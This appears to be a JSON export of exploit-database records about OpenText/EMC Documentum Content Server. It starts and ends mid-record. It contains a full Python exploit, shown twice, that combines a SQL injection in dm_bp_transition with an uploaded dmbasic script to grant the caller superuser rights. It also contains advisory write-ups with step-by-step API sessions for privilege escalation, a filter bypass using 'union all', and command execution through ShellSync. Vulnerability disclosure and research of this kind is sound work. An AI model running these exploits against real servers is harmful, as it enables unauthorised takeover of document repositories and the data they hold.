\\\n \"\\nQuery = \\\"query,c,update dm_user objects set \" \\\n \"user_privileges=16 where user_name=\\'%s\\'\\\"\" \\\n \"\\nQueryID = dmAPIGet(Query)\" \\\n \"\\nQueryID = dmAPIExec(\\\"commit,c\\\")\" \\\n \"\\nEntryCriteria=True\" \\\n \"\\nEnd Function\" % (sys.argv[3])\n\n b = bytearray()\n b.extend(data)\n\n if not session.start_push(handle, content_id, format['r_object_id'], len(b)):\n print \"Failed to start push\"\n exit(1)\n\n session.upload(handle, b)\n data_ticket = session.end_push_v2(handle)['DATA_TICKET']\n\n procedure = False\n try:\n print \"Trying to create dm_procedure\"\n document = TypedObject(session=session)\n document.set_string(\"OBJECT_TYPE\", \"dm_procedure\")\n document.set_bool(\"IS_NEW_OBJECT\", True)\n document.set_int(\"i_vstamp\", 0)\n document.set_int(\"world_permit\", 7)\n document.set_string(\"object_name\", \"CVE-2014-2513\")\n document.set_string(\"r_object_type\", \"dm_procedure\")\n document.append_id(\"i_contents_id\", content_id)\n document.set_int(\"r_page_cnt\", 1)\n document.set_string(\"a_content_type\", format['name'])\n document.set_bool(\"i_has_folder\", True)\n document.set_bool(\"i_latest_flag\", True)\n document.set_id(\"i_chronicle_id\", document_id)\n document.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"])\n document.set_int(\"r_content_size\", len(b))\n if session.sys_obj_save(document_id, document):\n procedure = True\n except Exception, e:\n print str(e)\n\n if not procedure:\n print \"Failed to create dm_procedure\"\n print \"Trying to create dm_sysobject\"\n document = TypedObject(session=session)\n document.set_string(\"OBJECT_TYPE\", \"dm_sysobject\")\n document.set_bool(\"IS_NEW_OBJECT\", True)\n document.set_int(\"i_vstamp\", 0)\n document.set_string(\"owner_name\", sys.argv[3])\n document.set_int(\"world_permit\", 7)\n document.set_string(\"object_name\", \"CVE-2017-7221\")\n document.set_string(\"r_object_type\", \"dm_sysobject\")\n document.append_id(\"i_contents_id\", content_id)\n document.set_int(\"r_page_cnt\", 1)\n document.set_string(\"a_content_type\", format['name'])\n document.set_bool(\"i_has_folder\", True)\n document.set_bool(\"i_latest_flag\", True)\n document.set_id(\"i_chronicle_id\", document_id)\n document.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"])\n document.set_int(\"r_content_size\", len(b))\n if not session.sys_obj_save(document_id, document):\n print \"Failed to create dm_sysobject\"\n exit(1)\n\n content = TypedObject(session=session)\n content.set_string(\"OBJECT_TYPE\", \"dmr_content\")\n content.set_bool(\"IS_NEW_OBJECT\", True)\n content.set_id(\"storage_id\", store['r_object_id'])\n content.set_id(\"format\", format['r_object_id'])\n content.set_int(\"data_ticket\", data_ticket)\n content.set_id(\"parent_id\", document_id)\n content.set_int(\"page\", 0)\n content.set_string(\"full_format\", format['name'])\n content.set_int(\"content_size\", len(b))\n if not session.save_cont_attrs(content_id, content):\n print \"Failed to create content\"\n exit(1)\n\n if procedure:\n query = \"execute do_method WITH METHOD='dm_bp_transition',\" \\\n \" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\\n \"0000000000000000 0000000000000000 \\\"%s\\\" \" \\\n \"0000000000000000 0000000000000000 0000000000000000 \" \\\n \"\\\"\\\" 0 0 T F T T %s %s'\" % \\\n (docbase, docbase, install_owner, document_id,\n install_owner, session.session)\n else:\n query = \"execute do_method WITH METHOD='dm_bp_transition',\" \\\n \" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\\n \"0000000000000000 0000000000000000 \\\"%s,'' \" \\\n \"union\\b select r_object_id from dm_sysobject(all) where r_object_id=''%s\\\" \" \\\n \"0000000000000000 0000000000000000 0000000000000000 \" \\\n \"\\\"\\\" 0 0 T F T T %s %s'\" % \\\n (docbase, docbase, install_owner, document_id,\n document_id, install_owner, session.session)\n\n session.query(query)\n\n r = session.query(\n \"select user_privileges from dm_user \"\n \"where user_name=USER\") \\\n .next_record()['user_privileges']\n if r != 16:\n print \"Failed\"\n exit(1)\n print \"P0wned!\"\n\n\ndef create_session(host, port, user, pwd, identity=None):\n print \"Trying to connect to %s:%s as %s ...\" % \\\n (host, port, user)\n session = None\n try:\n session = DocbaseClient(\n host=host, port=int(port),\n username=user, password=pwd,\n identity=identity)\n except socket.error, e:\n if e.errno == 54:\n session = DocbaseClient(\n host=host, port=int(port),\n username=user, password=pwd,\n identity=identity,\n secure=True, ciphers=CIPHERS)\n else:\n raise e\n docbase = session.docbaseconfig['object_name']\n version = session.serverconfig['r_server_version']\n print \"Connected to %s:%s, docbase: %s, version: %s\" % \\\n (host, port, docbase, version)\n return (session, docbase)\n\n\ndef is_super_user(session):\n user = session.get_by_qualification(\n \"dm_user WHERE user_name=USER\")\n if user['user_privileges'] == 16:\n return True\n group = session.get_by_qualification(\n \"dm_group where group_name='dm_superusers' \"\n \"AND any i_all_users_names=USER\")\n if group is not None:\n return True\n\n return False\n\n\nif __name__ == '__main__':\n main()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-04-25T15:25:34", "description": "", "cvss3": {}, "published": "2017-04-25T00:00:00", "type": "packetstorm", "title": "OpenText Documentum Content Server SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4533", "CVE-2017-7221", "CVE-2014-2513"], "modified": "2017-04-25T00:00:00", "id": "PACKETSTORM:142301", "href": "https://packetstormsecurity.com/files/142301/OpenText-Documentum-Content-Server-SQL-Injection.html", "sourceData": "`#!/usr/bin/env python \n \nimport socket \nimport sys \nfrom os.path import basename \n \nfrom dctmpy.docbaseclient import DocbaseClient \nfrom dctmpy.obj.typedobject import TypedObject \n \nCIPHERS = \"ALL:aNULL:!eNULL\" \n \n \ndef usage(): \nprint \"usage:\\n\\t%s host port user password\" % basename(sys.argv[0]) \n \n \ndef main(): \nif len(sys.argv) != 5: \nusage() \nexit(1) \n \n(session, docbase) = create_session(*sys.argv[1:5]) \n \nif is_super_user(session): \nprint \"Current user is a superuser, nothing to do\" \nexit(1) \n \ninstall_owner = session.serverconfig['r_install_owner'] \ndocument_id = session.next_id(0x08) \ncontent_id = session.next_id(0x06) \n \nstore = session.get_by_qualification(\"dm_store\") \nformat = session.get_by_qualification(\"dm_format where name='crtext'\") \nhandle = session.make_pusher(store['r_object_id']) \nif handle < 1: \nprint \"Unable to create pusher\" \nexit(1) \n \ndata = \"Public Function EntryCriteria(ByVal SessionId As String,_\" \\ \n\"\\nByVal ObjectId As String,_\" \\ \n\"\\nByVal UserName As String,_\" \\ \n\"\\nByVal TargetState As String,_\" \\ \n\"\\nByRef ErrorString As String) As Boolean\" \\ \n\"\\nDim QueryID As String\" \\ \n\"\\nDim Query As String\" \\ \n\"\\nQuery = \\\"query,c,update dm_user objects set \" \\ \n\"user_privileges=16 where user_name=\\'%s\\'\\\"\" \\ \n\"\\nQueryID = dmAPIGet(Query)\" \\ \n\"\\nQueryID = dmAPIExec(\\\"commit,c\\\")\" \\ \n\"\\nEntryCriteria=True\" \\ \n\"\\nEnd Function\" % (sys.argv[3]) \n \nb = bytearray() \nb.extend(data) \n \nif not session.start_push(handle, content_id, format['r_object_id'], len(b)): \nprint \"Failed to start push\" \nexit(1) \n \nsession.upload(handle, b) \ndata_ticket = session.end_push_v2(handle)['DATA_TICKET'] \n \nprocedure = False \ntry: \nprint \"Trying to create dm_procedure\" \ndocument = TypedObject(session=session) \ndocument.set_string(\"OBJECT_TYPE\", \"dm_procedure\") \ndocument.set_bool(\"IS_NEW_OBJECT\", True) \ndocument.set_int(\"i_vstamp\", 0) \ndocument.set_int(\"world_permit\", 7) \ndocument.set_string(\"object_name\", \"CVE-2014-2513\") \ndocument.set_string(\"r_object_type\", \"dm_procedure\") \ndocument.append_id(\"i_contents_id\", content_id) \ndocument.set_int(\"r_page_cnt\", 1) \ndocument.set_string(\"a_content_type\", format['name']) \ndocument.set_bool(\"i_has_folder\", True) \ndocument.set_bool(\"i_latest_flag\", True) \ndocument.set_id(\"i_chronicle_id\", document_id) \ndocument.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"]) \ndocument.set_int(\"r_content_size\", len(b)) \nif session.sys_obj_save(document_id, document): \nprocedure = True \nexcept Exception, e: \nprint str(e) \n \nif not procedure: \nprint \"Failed to create dm_procedure\" \nprint \"Trying to create dm_sysobject\" \ndocument = TypedObject(session=session) \ndocument.set_string(\"OBJECT_TYPE\", \"dm_sysobject\") \ndocument.set_bool(\"IS_NEW_OBJECT\", True) \ndocument.set_int(\"i_vstamp\", 0) \ndocument.set_string(\"owner_name\", sys.argv[3]) \ndocument.set_int(\"world_permit\", 7) \ndocument.set_string(\"object_name\", \"CVE-2017-7221\") \ndocument.set_string(\"r_object_type\", \"dm_sysobject\") \ndocument.append_id(\"i_contents_id\", content_id) \ndocument.set_int(\"r_page_cnt\", 1) \ndocument.set_string(\"a_content_type\", format['name']) \ndocument.set_bool(\"i_has_folder\", True) \ndocument.set_bool(\"i_latest_flag\", True) \ndocument.set_id(\"i_chronicle_id\", document_id) \ndocument.append_string(\"r_version_label\", [\"1.0\", \"CURRENT\"]) \ndocument.set_int(\"r_content_size\", len(b)) \nif not session.sys_obj_save(document_id, document): \nprint \"Failed to create dm_sysobject\" \nexit(1) \n \ncontent = TypedObject(session=session) \ncontent.set_string(\"OBJECT_TYPE\", \"dmr_content\") \ncontent.set_bool(\"IS_NEW_OBJECT\", True) \ncontent.set_id(\"storage_id\", store['r_object_id']) \ncontent.set_id(\"format\", format['r_object_id']) \ncontent.set_int(\"data_ticket\", data_ticket) \ncontent.set_id(\"parent_id\", document_id) \ncontent.set_int(\"page\", 0) \ncontent.set_string(\"full_format\", format['name']) \ncontent.set_int(\"content_size\", len(b)) \nif not session.save_cont_attrs(content_id, content): \nprint \"Failed to create content\" \nexit(1) \n \nif procedure: \nquery = \"execute do_method WITH METHOD='dm_bp_transition',\" \\ \n\" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\ \n\"0000000000000000 0000000000000000 \\\"%s\\\" \" \\ \n\"0000000000000000 0000000000000000 0000000000000000 \" \\ \n\"\\\"\\\" 0 0 T F T T %s %s'\" % \\ \n(docbase, docbase, install_owner, document_id, \ninstall_owner, session.session) \nelse: \nquery = \"execute do_method WITH METHOD='dm_bp_transition',\" \\ \n\" ARGUMENTS='%s %s %s \\\"\\\" 0000000000000000 \" \\ \n\"0000000000000000 0000000000000000 \\\"%s,'' \" \\ \n\"union\\b select r_object_id from dm_sysobject(all) where r_object_id=''%s\\\" \" \\ \n\"0000000000000000 0000000000000000 0000000000000000 \" \\ \n\"\\\"\\\" 0 0 T F T T %s %s'\" % \\ \n(docbase, docbase, install_owner, document_id, \ndocument_id, install_owner, session.session) \n \nsession.query(query) \n \nr = session.query( \n\"select user_privileges from dm_user \" \n\"where user_name=USER\") \\ \n.next_record()['user_privileges'] \nif r != 16: \nprint \"Failed\" \nexit(1) \nprint \"P0wned!\" \n \n \ndef create_session(host, port, user, pwd, identity=None): \nprint \"Trying to connect to %s:%s as %s ...\" % \\ \n(host, port, user) \nsession = None \ntry: \nsession = DocbaseClient( \nhost=host, port=int(port), \nusername=user, password=pwd, \nidentity=identity) \nexcept socket.error, e: \nif e.errno == 54: \nsession = DocbaseClient( \nhost=host, port=int(port), \nusername=user, password=pwd, \nidentity=identity, \nsecure=True, ciphers=CIPHERS) \nelse: \nraise e \ndocbase = session.docbaseconfig['object_name'] \nversion = session.serverconfig['r_server_version'] \nprint \"Connected to %s:%s, docbase: %s, version: %s\" % \\ \n(host, port, docbase, version) \nreturn (session, docbase) \n \n \ndef is_super_user(session): \nuser = session.get_by_qualification( \n\"dm_user WHERE user_name=USER\") \nif user['user_privileges'] == 16: \nreturn True \ngroup = session.get_by_qualification( \n\"dm_group where group_name='dm_superusers' \" \n\"AND any i_all_users_names=USER\") \nif group is not None: \nreturn True \n \nreturn False \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142301/CVE-2017-7221.py.txt"}, {"lastseen": "2016-12-05T22:14:32", "description": "", "cvss3": {}, "published": "2015-08-18T00:00:00", "type": "packetstorm", "title": "EMC Documentum Content Server Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4531", "CVE-2011-4144", "CVE-2014-4622"], "modified": "2015-08-18T00:00:00", "id": "PACKETSTORM:133143", "href": "https://packetstormsecurity.com/files/133143/EMC-Documentum-Content-Server-Privilege-Escalation.html", "sourceData": "`Product: EMC Documentum Content Server \nVendor: EMC \nVersion: ANY \nCVE: N/A \nRisk: High \nStatus: public/not fixed \n \nIn 2011 Yuri Simone discovered a security flaw in EMC Documentum Content \nServer, which allows users with sysadmin privileges to elevate their \nprivileges to superuser (see CVE-2011-4144). On April 2014 I discovered \nanother set of vulnerabilities related to CVE-2011-4144 (see attached \nVRF#HUDHKNW4.txt). On September 2014 vendor announced a fix (see \nCVE-2014-4622) for the first only vulnerability from VRF#HUDHKNW4.txt (check \nrow 5 in CERT's spreadsheet for VU#315340 \n(http://www.kb.cert.org/vuls/id/315340)). Yesterday vendor announced a new \nfix (see CVE-2015-4531) related to VRF#HUDHKNW4.txt. Besides the fact that \nCVE-2015-4531 has a completely wrong description, CVE-2015-4531 does not \nintroduce any security fixes. I believe that there are about a dozen of \noptions to elevate privileges from sysadmin to superuser, but I'm going to \ndescribe the most obvious one. \n \n1. If attacker is able to create (or modify) docbase method (object with \ndm_method type) he is able to elevate his privileges through executing this \nmethod, example: \n \ncat > test.ebs \nConst CONNECTION_ERROR As Integer = 33 \n \nSub rmain(d As String, u As String, g As String) \ns$ = dmAPIGet(\"connect,\" & d & \",\" & u & \",\") \n \nIf s = \"\" Then \ndmExit(CONNECTION_ERROR) \nEnd If \n \nq$ = \"update dm_user objects\" & _ \n\" set user_privileges=16\" & _ \n\" where user_name='\" & g & \"'\" \n \ns=dmAPIExec(\"execquery,\" & s & \",T,\" & q) \n \nEnd Sub \n \n \nAPI> create,c,dm_method \n... \n10024be98001f92d \nAPI> set,c,l,object_name \nSET> test \n... \nOK \nAPI> setfile,c,l,test.ebs,crtext \n... \nOK \nAPI> set,c,l,method_verb \nSET> ./dmbasic -ermain \n... \nOK \nAPI> set,c,l,run_as_server \nSET> T \n... \nOK \nAPI> set,c,l,use_method_content \nSET> T \n... \nOK \nAPI> set,c,l,method_type \nSET> dmbasic \n... \nOK \nAPI> save,c,l \n... \nOK \nAPI> retrieve,c,dm_user where user_name='test' \n... \n11024be980000e8a \nAPI> get,c,l,user_privileges \n... \n0 \nAPI> apply,c,,DO_METHOD,METHOD,S,test, \nARGUMENTS,S,'repo dmadmin test' \n... \nq0 \nAPI> retrieve,c,dm_user where user_name='test' \n... \n11024be980000e8a \nAPI> get,c,l,user_privileges \n... \n16 \n \n2. for the reason mentioned above regular users are unable to create or \nmodify docbase methods: \n \nAPI> create,c,dm_method \n... \n10024be98001f954 \nAPI> save,c,l \n... \n[DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: \"The current user (test) \nneeds to have superuser or sysadmin privilege to save or destroy \ndm_method object.\" \n \n3. But sysadmins were able to create docbase methods. Now if sysadmin tries \nto create docbase method it gets following error: \n \nAPI> create,c,dm_method \n... \n10024be98001f968 \nAPI> set,c,l,object_name \nSET> test1 \n... \nOK \nAPI> setfile,c,l,test.ebs,crtext \n... \nOK \nAPI> set,c,l,method_verb \nSET> ./dmbasic -ermain \n... \nOK \nAPI> save,c,l \n... \n[DM_SYSOBJECT_E_LINK_PERMIT2]error: \"Linking or unlinking to the folder \n'/System/Methods' failed on sysobject '10024be98001f968'. \nWRITE permit is required on the folder, when using folder security.\" \n \n4. So, it is obvious that remediation provided by vendor relies on ACL \nrestrictions for /System/Methods folder, the problem is vendor does not take \ninto account that Content Server has a set of groups which allow to bypass \nACL restrictions and are still manageable by sysadmin users, example: \n \nAPI> ?,c,alter group dm_escalated_write add testadmin \n \nAPI> create,c,dm_method \n... \n10024be98001f969 \nAPI> set,c,l,object_name \nSET> test1 \n... \nOK \nAPI> setfile,c,l,test.ebs,crtext \n... \nOK \nAPI> set,c,l,method_verb \nSET> ./dmbasic -ermain \n... \nOK \nAPI> save,c,l \n... \nOK \n \n \n \n__ \nRegards, \nAndrey B. Panfilov \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/133143/emcdcs-escalate.txt"}, {"lastseen": "2016-12-05T22:17:10", "description": "", "cvss3": {}, "published": "2015-08-18T00:00:00", "type": "packetstorm", "title": "EMC Documentum Content Server Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4532"], "modified": "2015-08-18T00:00:00", "id": "PACKETSTORM:133144", "href": "https://packetstormsecurity.com/files/133144/EMC-Documentum-Content-Server-Code-Execution.html", "sourceData": "`Product: EMC Documentum Content Server \nVendor: EMC \nVersion: ANY \nCVE: N/A \nRisk: High \nStatus: public/not fixed \n \nFor detailed description see http://seclists.org/bugtraq/2015/Jul/51 \n \nNew behavior introduced in CVE-2015-4532: \n \nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS=' \nrepo repo dmadmin \"\" 0000000000000000 0000000000000000 \n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id \nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\" \n0000000000000000 0000000000000000 0000000000000000 \"\" \n0 0 T F T T dmadmin 0000000000000000' \n \n[DM_METHOD_E_METHOD_ARGS_INVALID]error: \n\"The arguments being passed to the method 'dm_bp_transition' are \ninvalid: \narguments contain sql keywords which are not allowed.\" \n \n \nNew attack vector (note ALL keyword): \n \nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS=' \nrepo repo dmadmin \"\" 0000000000000000 0000000000000000 \n0000000000000000 \"0801fd08805c9dfe,'' union all select r_object_id \nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\" \n0000000000000000 0000000000000000 0000000000000000 \"\" \n0 0 T F T T dmadmin 0000000000000000' \n \n__ \nRegards, \nAndrey B. Panfilov \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/133144/emcdcs-exec.txt"}, {"lastseen": "2016-12-05T22:15:29", "description": "", "cvss3": {}, "published": "2015-07-09T00:00:00", "type": "packetstorm", "title": "EMC Documentum Content Server CVE-2014-2513 Bad Fix", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-2513"], "modified": "2015-07-09T00:00:00", "id": "PACKETSTORM:132628", "href": "https://packetstormsecurity.com/files/132628/EMC-Documentum-Content-Server-CVE-2014-2513-Bad-Fix.html", "sourceData": "`Product: EMC Documentum Content Server \nVendor: EMC \nVersion: ANY \nCVE: N/A \nRisk: High \nStatus: public/not fixed \n \nOn November 2013 I discovered vulnerability in EMC Documentum Content Server \nwhich allow authenticated user to execute arbitrary commands using \ndm_bp_transition docbase method (for detailed description see \nVRF#HUFPRMOP.txt). \n \nOn July 2014 vendor announced ESA-2014-064 which was claiming that \nvulnerability has been remediated. \n \nOn November 2014 fix was contested (there was significant delay after \nESA-2014-064 because vendor constantly fails to provide status of reported \nvulnerabilities) by providing another proof of concept, description provided \nto CERT/CC (another CNA was chosen because vendor fails to communicate) was: \n \n=================================8<================================ \nI have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following \nerror: \n \n[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected \nerror: [DM_API_W_NO_MATCH]warning: \"There was no match in the \ndocbase for the qualification: dm_procedure where r_object_id = \n'0801fd08805c9dfe'\" \n \nSuch behaviour means that EMC tried to remediate a security issue by \n\u201cchecking\u201d object type of supplied object: \n \nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle \nSession id is s0 \nAPI> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe' \n... \n[DM_API_W_NO_MATCH]warning: \"There was no match in the docbase for the \nqualification: dm_procedure where r_object_id = '0801fd08805c9dfe'\" \n \nAPI> Bye \n \nbin]$ strings dmbasic| grep dm_procedure \nid,%s,dm_procedure where object_name = '%s' and folder('%s') \nid,%s,dm_procedure where r_object_id = '%s' \n# old version of dmbasic binary \nbin]$ strings dmbasic| grep dm_procedure \nbin]$ \n \nSo, the fix was implemented in dmbasic binary, the problem is neither 6.7 \nSP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch \nthat was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the \nissue is still reproducible because introduced check could be bypassed \nusing SQL injection: \n \n~]$ cat test.ebs \nPublic Function EntryCriteria(ByVal SessionId As String,_ \nByVal ObjectId As String,_ \nByVal UserName As String,_ \nByVal TargetState As String,_ \nByRef ErrorString As String) As Boolean \nt = ShellSync(\"echo dm_bp_transition_has_vulnerability > /tmp/test\") \nEntryCriteria=True \nEnd Function \n~]$ cat /tmp/test \ncat: /tmp/test: No such file or directory \n \n~]$ iapi \nPlease enter a docbase name (docubase): repo \nPlease enter a user (dmadmin): test01 \nPlease enter password for test01: \n \n \nEMC Documentum iapi - Interactive API interface \n(c) Copyright EMC Corp., 1992 - 2011 \nAll rights reserved. \nClient Library Release 6.7.2190.0142 \n \n \nConnecting to Server using docbase repo \n[DM_SESSION_I_SESSION_START]info: \"Session 0101fd088014000c started for \nuser test01.\" \n \n \nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle \nSession id is s0 \nAPI> create,c,dm_sysobject \n... \n0801fd08805c9dfe \nAPI> set,c,l,object_name \nSET> test \n... \nOK \nAPI> setfile,c,l,test.ebs,crtext \n... \nOK \nAPI> save,c,l \n... \nOK \nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS=' \nrepo repo dmadmin \"\" 0000000000000000 0000000000000000 \n0000000000000000 \"0801fd08805c9dfe,'' union select r_object_id \nfrom dm_sysobject where r_object_id=''0801fd08805c9dfe\" \n0000000000000000 0000000000000000 0000000000000000 \"\" \n0 0 T F T T dmadmin 0000000000000000' \n \n... \n \n(1 row affected) \n \nAPI> Bye \n~]$ cat /tmp/test \ndm_bp_transition_has_vulnerability \n~]$ \n \nHere \u2018union \u2026\u2019 allows to bypass check based on \"id\" call: \n \nConnected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle \nSession id is s0 \nAPI> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union \nselect r_object_id from dm_sysobject where \nr_object_id='0801fd08805c9dfe' \n... \n0801fd08805c9dfe \nAPI> apply,c,,GET_LAST_SQL \n... \nq0 \nAPI> next,c,q0 \n... \nOK \nAPI> get,c,q0,result \n... \n \nselect all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where \n((dm_procedure.r_object_id='0801fd08805c9dfe,')) and \n(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0) \nunion select all dm_sysobject.r_object_id from dm_sysobject_sp \ndm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe')) \nand (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0) \n \nAPI> close,c,q0 \n... \nOK \n \nComma is required to bypass error in fetch call: \nAPI> fetch,c,0801fd08805c9dfe' union select r_object_id from \ndm_sysobject where r_object_id='0801fd08805c9dfe \n... \n[DM_API_E_BADID]error: \"Bad ID given: 0801fd08805c9dfe' union \nselect r_object_id from dm_sysobject where r_object_id= \n'0801fd08805c9dfe\" \n \n \nAPI> fetch,c,0801fd08805c9dfe,' union select r_object_id from \ndm_sysobject where r_object_id='0801fd08805c9dfe \n... \nOK \n=================================>8================================ \n \n__ \nRegards, \nAndrey B. Panfilov \n`\n", "cvss": {"score": 8.2, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132628/emcdcs-contested.txt"}], "zdt": [{"lastseen": "2018-03-13T03:06:31", "description": "EMC Documentum Content Server suffers from a privilege escalation vulnerability.", "cvss3": {}, "published": "2015-08-19T00:00:00", "type": "zdt", "title": "EMC Documentum Content Server Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4531", "CVE-2011-4144", "CVE-2014-4622"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24074", "href": "https://0day.today/exploit/description/24074", "sourceData": "Product: EMC Documentum Content Server\r\nVendor: EMC\r\nVersion: ANY\r\nCVE: N/A\r\nRisk: High\r\nStatus: public/not fixed\r\n\r\nIn 2011 Yuri Simone discovered a security flaw in EMC Documentum Content \r\nServer, which allows users with sysadmin privileges to elevate their \r\nprivileges to superuser (see CVE-2011-4144). On April 2014 I discovered \r\nanother set of vulnerabilities related to CVE-2011-4144 (see attached \r\nVRF#HUDHKNW4.txt). On September 2014 vendor announced a fix (see \r\nCVE-2014-4622) for the first only vulnerability from VRF#HUDHKNW4.txt (check \r\nrow 5 in CERT's spreadsheet for VU#315340 \r\n(http://www.kb.cert.org/vuls/id/315340)). Yesterday vendor announced a new \r\nfix (see CVE-2015-4531) related to VRF#HUDHKNW4.txt. Besides the fact that \r\nCVE-2015-4531 has a completely wrong description, CVE-2015-4531 does not \r\nintroduce any security fixes. I believe that there are about a dozen of \r\noptions to elevate privileges from sysadmin to superuser, but I'm going to \r\ndescribe the most obvious one.\r\n\r\n1. If attacker is able to create (or modify) docbase method (object with \r\ndm_method type) he is able to elevate his privileges through executing this \r\nmethod, example:\r\n\r\ncat > test.ebs\r\nConst CONNECTION_ERROR As Integer = 33\r\n\r\nSub rmain(d As String, u As String, g As String)\r\n s$ = dmAPIGet(\"connect,\" & d & \",\" & u & \",\")\r\n\r\n If s = \"\" Then\r\n dmExit(CONNECTION_ERROR)\r\n End If\r\n\r\n q$ = \"update dm_user objects\" & _\r\n \" set user_privileges=16\" & _\r\n \" where user_name='\" & g & \"'\"\r\n\r\n s=dmAPIExec(\"execquery,\" & s & \",T,\" & q)\r\n\r\nEnd Sub\r\n\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f92d\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> set,c,l,run_as_server\r\nSET> T\r\n...\r\nOK\r\nAPI> set,c,l,use_method_content\r\nSET> T\r\n...\r\nOK\r\nAPI> set,c,l,method_type\r\nSET> dmbasic\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\nAPI> retrieve,c,dm_user where user_name='test'\r\n...\r\n11024be980000e8a\r\nAPI> get,c,l,user_privileges\r\n...\r\n0\r\nAPI> apply,c,,DO_METHOD,METHOD,S,test,\r\n ARGUMENTS,S,'repo dmadmin test'\r\n...\r\nq0\r\nAPI> retrieve,c,dm_user where user_name='test'\r\n...\r\n11024be980000e8a\r\nAPI> get,c,l,user_privileges\r\n...\r\n16\r\n\r\n2. for the reason mentioned above regular users are unable to create or \r\nmodify docbase methods:\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f954\r\nAPI> save,c,l\r\n...\r\n[DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: \"The current user (test)\r\n needs to have superuser or sysadmin privilege to save or destroy \r\ndm_method object.\"\r\n\r\n3. But sysadmins were able to create docbase methods. Now if sysadmin tries \r\nto create docbase method it gets following error:\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f968\r\nAPI> set,c,l,object_name\r\nSET> test1\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\n[DM_SYSOBJECT_E_LINK_PERMIT2]error: \"Linking or unlinking to the folder\r\n '/System/Methods' failed on sysobject '10024be98001f968'.\r\n WRITE permit is required on the folder, when using folder security.\"\r\n\r\n4. So, it is obvious that remediation provided by vendor relies on ACL \r\nrestrictions for /System/Methods folder, the problem is vendor does not take \r\ninto account that Content Server has a set of groups which allow to bypass \r\nACL restrictions and are still manageable by sysadmin users, example:\r\n\r\nAPI> ?,c,alter group dm_escalated_write add testadmin\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f969\r\nAPI> set,c,l,object_name\r\nSET> test1\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\n\r\n\r\n\r\n__\r\nRegards,\r\nAndrey B. Panfilov\n\n# 0day.today [2018-03-13] #", "sourceHref": "https://0day.today/exploit/24074", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-12T19:47:39", "description": "EMC Documentum Content Server suffers from an arbitrary code execution vulnerability.", "cvss3": {}, "published": "2015-08-19T00:00:00", "type": "zdt", "title": "EMC Documentum Content Server Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4532"], "modified": 